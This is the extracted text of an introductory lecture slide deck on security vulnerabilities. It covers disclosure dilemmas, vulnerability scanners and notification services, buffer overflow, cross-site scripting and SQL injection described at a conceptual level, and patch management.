Vulnerabilities Vulnerabilities flaws in systems that allow them
Vulnerabilities
Vulnerabilities • flaws in systems that allow them to be exploited • provide means for attackers to compromise hosts, servers and networks
Vulnerabilities • 2 flavors • bugs – programming mistakes • Errors in code that could cause a system to hang to an insecure state or allow root access • Incorrect firewall/router/IDS rules • flaws – improper design • failing to account for all possibilities in design leads to code with vulnerable ‘features’
Vulnerabilities • 2 -edged sword • publishing vulnerabilities and patches is only way to fix problem • once published – the network of hackers is aware of the vulnerability • patch management is a MAJOR security problem!
Vulnerabilities • ‘Security by Obscurity’ • attempts to use secrecy to prevent knowledge of vulnerabilities • vendors of proprietary code are often accused of this • zero-day attack • attack takes place during the window between when a vulnerability becomes known and a patch is discovered
Between a ‘rock and a hard place’ • what do you do if you discover a vulnerability in a product and a patch is not available? • do you keep it secret until a patch is developed? • this leaves customers vulnerable • the vendor may not work to fix it since there is no pressure • do you publicize it to put pressure on the vendor? • knowing that by doing so you have notified all of the hacker community
Between a ‘rock and a hard place’ Example 1: • In 2009 Microsoft announced vulnerability in SMB subsystem that could leave servers vulnerable to DOS attack • there was no patch yet • IT managers had two choices • disable SMB – meaning some systems would not work • wait for patch and pray there would not be an incident
Between a ‘rock and a hard place’ Example 2: • in 2008 a Mass. Dist. Judge ordered MIT students to NOT present information at Def. Con regarding a vulnerability in the MTA ‘Charlie. Ticket’ system • judge said intent was not to silence students but enforce a reasonable period during which a fix could be found • the gag order was overturned, but not until after Def. Con had concluded http: //www. informationweek. com/news/security/vulnerabilities/210002185
Vulnerability Management • many strategies for managing vulnerabilities • vulnerability scanners • vulnerability notification • vulnerability information online through CERT • vulnerability and penetration testing services • these go hand-in-hand with adequate patch management
Vulnerability Scanners • programs that scan a network, host or application for known vulnerabilities • Types • port scanner – looks for open ports (nmap) • network enumerator – provides information on groups, usernames, shares and services (nmap and nessus) • network vulnerability scanner – looks for vulnerabilities in network resources and servers (nessus, SAINT) • Web application security scanner – looks for vulnerabilities in Web servers and scripts (SAINT, Metasploit Pro) • Database security scanner – Looks for vulnerabilities in DBMS and SQL code (Safety Lab Shadow)
Vulnerability Notification • many vendors will either mail a notification or post to a Web site when a vulnerability has been found and how to patch it • services exist that maintain vulnerability lists for multiple products and will provide notification • with many of these you provide a list of the software and versions in your organization
Vulnerability Notification • examples • Vupen Security vulnerability services http: //www. vupen. com/english/services/ • Secure. Net Solutions vulnerability notification service http: //www. securenetsol. com/am_trial_term s. html • Secundia CSI free for home users http: //secunia. com/vulnerability_scanning/p ersonal/
Vulnerability Notification • CERT (Computer Emergency Response Team) at CMU • provides weekly list of known vulnerabilities • organization security team matches inventory of software and versions to this list http: //www. cert. org/advisories/ http: //www. us-cert. gov/cas/bulletins/
Threats – the counterpart to vulnerabilities • Threats exploit vulnerabilities • vulnerability – you left your car unlocked • threat – criminals going through shopping center parking lots looking for unlocked cars • Fortinet’s Forti. Guard Center Threat Research and Response Center provides Threat reports and advisories http: //www. fortiguard. com/ • Awareness of threat landscape can help to prioritize vulnerabilities
Top 3 Application Vulnerabilities 1 – Buffer overflow • software may not enforce array bounds • can allow buffers (arrays used for I/O) to overflow and overwrite code area • some malware works this way ‘smashing the stack’ • mainly aimed at systems that allow code to be executed with privileged rights • best addressed in design and programming • patches can often fix this in vendor-supplied software http: //www. windowsecurity. com/articles/Analysis_of_Buffer_ Overflow_Attacks. html http: //www. youtube. com/watch? v=k. ZZg. Nnhx. A_4 (6 min)
Top 3 Application Vulnerabilities According to CERT 2 – cross-site scripting • code is injected into communications from a Web site • most ‘drive-by’ malware uses this method • often relies on social engineering to get user to follow link (Banks are especially targeted) • Web script writers can validate input and clense output • script disabling (although not always practical) • use of least-privilege account http: //www. ibm. com/developerworks/tivoli/library/s-csscript/
Top 3 Application Vulnerabilities According to CERT 3 – SQL injection • commands passed through Web form to SQL DBMS • can exploit lack of security and gain control of server • solution is to add code to validate input http: //www. youtube. com/watch? v=j. MQ 2 wd. Om. MIA (3 min)
Vulnerability Management Gartner defines 6 steps for vulnerability management • Define policy • Baseline the environment • Prioritize vulnerabilities • Mitigate vulnerabilities • Maintain and monitor
Patch Management • requires coordinated effort • knowing which patches are available • testing patches • scheduling patch installation http: //www. patchmanagement. org/pmessentials. asp • however – many systems remain unpatched • some applications (such as firefox) push patches • others (such as adobe) allow users to decide
Patch Management • although recognized as a major security problem – patch management is seen as a burden by traditional IT management • it sucks up resources • it adds nothing to the bottom-line http: //www. computerworld. com. au/article/44872/ patch_management_burdens_customers/? fp=16 &fpid=0
- Slides: 20